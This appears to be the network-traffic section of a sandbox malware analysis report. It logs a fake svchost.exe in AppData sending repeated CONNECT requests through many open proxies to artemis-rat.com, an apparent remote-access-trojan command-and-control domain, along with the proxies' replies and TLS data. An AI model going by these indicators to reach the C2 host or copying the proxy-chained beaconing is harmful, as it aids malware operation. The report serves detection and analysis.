                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1958192.168.2.55581961.129.2.212808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.282676935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.651648045 CET536INHTTP/1.1 502 Bad Gateway
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Sat, 09 Mar 2024 12:11:30 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Content-Length: 559
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64
                                                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padd


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1959192.168.2.556115104.129.199.57880043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.289586067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.450378895 CET125INHTTP/1.1 407 Unauthorized
                                                                                    Server: Zscaler/6.2
                                                                                    Cache-control: no-cache
                                                                                    Content-Length: 0
                                                                                    Proxy-Authenticate: Negotiate


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1960192.168.2.55588991.241.217.58909043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.294230938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1961192.168.2.55605538.183.135.18999943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.297672033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.992994070 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1962192.168.2.55611243.153.22.291000543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.301623106 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:28.475905895 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:28.475969076 CET160INHTTP/1.1 401 UnauthorizedContent-Type: text/plain; charset=utf-8WWW-Authenticate: Basic realm="proxy"errorMsg: The IP specified by the port is not availabl
                                                                                    Data Raw:
                                                                                    Data Ascii:


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1963192.168.2.555941152.32.132.2208043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.311263084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.973779917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.942898989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.834081888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.646472931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1964192.168.2.55601046.17.63.1661637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.345906019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.662237883 CET339INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/4.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 5
                                                                                    X-Squid-Error: TCP_RESET 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from proxy.wakoopa.com
                                                                                    Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 72 65 73 65 74
                                                                                    Data Ascii: reset


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1965192.168.2.555987211.222.252.187819343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.345994949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1966192.168.2.55561736.134.91.82888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.345995903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.005038977 CET324INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.16.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1967192.168.2.555981194.34.232.1078043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.348628998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.652441025 CET442INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                    Content-Length: 281
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1968192.168.2.55598913.37.59.99312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.349275112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.646923065 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1969192.168.2.555942112.78.165.608043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.349968910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.067466974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.552197933 CET19INHTTP/1.1 200 OK
                                                                                    Mar 9, 2024 13:14:33.608123064 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a8 32 96 78 51 a8 b0 e3 a1 23 25 c4 72 22 64 64 2e 84 29 15 a5 5a 1b e5 c1 5d 38 9c 04 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eR2xQ#%r"dd.)Z]8*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:33.995410919 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ec 52 a9 51 c6 f0 51 21 f9 06 1f 70 f9 ca ab 9b d8 3c 60 e6 9b 89 1a 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                                    Data Ascii: C?eRQQ!p<`DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                                                                    Mar 9, 2024 13:14:33.995491982 CET1286INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                                                                    Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<Arp'~00tP'S"0*H0G10UUS
                                                                                    Mar 9, 2024 13:14:33.995513916 CET1286INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
                                                                                    Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                                                                                    Mar 9, 2024 13:14:33.995532036 CET238INData Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e
                                                                                    Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%Qh
                                                                                    Mar 9, 2024 13:14:34.345110893 CET498INData Raw: 49 fd 5a 9a ca 01 23 ac 84 80 2b 02 8c 99 97 eb 49 6a 8c 75 d7 c7 de b2 c9 97 9f 58 48 57 0e 35 a1 e4 1a d6 fd 6f 83 81 6f ef 8c cf 97 af c0 85 2a f0 f5 4e 69 09 91 2d e1 68 b8 c1 2b 73 e9 d4 d9 fc 22 c0 37 1f 0b 66 1d 49 ed 02 55 8f 67 e1 32 d7
                                                                                    Data Ascii: IZ#+IjuXHW5oo*Ni-h+s"7fIUg2&p=gm=|42njoK;7D~lF!fUl)f[wIH(3rS5b$9~*AR?,( B@/7P|3cM$/;L-
                                                                                    Mar 9, 2024 13:14:34.346390009 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 4b 9c e4 ae 88 23 e1 b7 c3 e0 82 1b fc 57 29 d7 b5 74 c9 32 fc fe 21 3b 0a 0e 01 6e af 65 b0 6a 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 0b 0c 3c 39 7a 97 eb af 19 47 c1 72 53 f9 99 de 76 22 96 b6 0e
                                                                                    Data Ascii: %! K#W)t2!;nej(<9zGrSv"{qJ
                                                                                    Mar 9, 2024 13:14:34.722484112 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 5a 17 6c fc 96 79 f4 13 45 84 8d 90 63 af ff 94 d6 fd 8a 43 38 c3 29 6c 09 b7 a7 90 d9 f1 d9 48 d2 40 d4 df 5e 6e 0e eb c4 cc 2e ec 9c e2 80 c0 e9 19 7e d8 20 fd 35 24 c6 db 63 b0 45 f4 6d 96 5b 6d bd
                                                                                    Data Ascii: ZlyEcC8)lH@^n.~ 5$cEm[m48f{XADrptx\9N~&m]i`h)MOYiVuCkC2ng{`U]pe2JFP(?p'ebW
                                                                                    Mar 9, 2024 13:14:34.768305063 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 1d 3c aa 26 11 da 1e 3c aa 03 06 c3 29 99 81 b2 5f 10 2b 33 7c 87 8b 15 b1 4e af e4 be e7 e8 40 36 84 a9 ca 3e 24 fd f0 78 10 db 93 ad 06 30 2f 8b 16 97 12 67 c2 6a 7d c2 5c fa 6a 83 d8 53 75 69 ea ae 53 8e
                                                                                    Data Ascii: <&<)_+3|N@6>$x0/gj}\jSuiSS{A00tk'{8tZ$<7F~ 7z_Y>${;A6<Un%-`]/~#]2W8ksTp%qu=rVf-Zv
                                                                                    Mar 9, 2024 13:14:35.158457041 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 ab 07 c7 cb fa 83 97 1e a3 31 22 88 ff c0 13 15 74 02 c8 d7 88 27 d9 ba 28 37 15 8f 88 ec 33 9a 53 b1 fe ca fe 14 55 cd 61 bc a1 5f a7 00 75 41 47 4e 05 36 73 fc 96 9c f0 1f 59 20 87 fc a1 2b fb 47 83 8b 26
                                                                                    Data Ascii: q1"t'(73SUa_uAGN6sY +G&r7J n;)g%TaV-8C=yUlp:(9$27!n{kN}`%rI76D|z$uDWuoK'?


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1970192.168.2.55607270.166.167.555774543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.350308895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1971192.168.2.55601143.131.248.1651567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.368232012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1972192.168.2.556001123.126.158.508043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.368235111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1973192.168.2.556184104.17.248.1648043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.368618011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.523034096 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
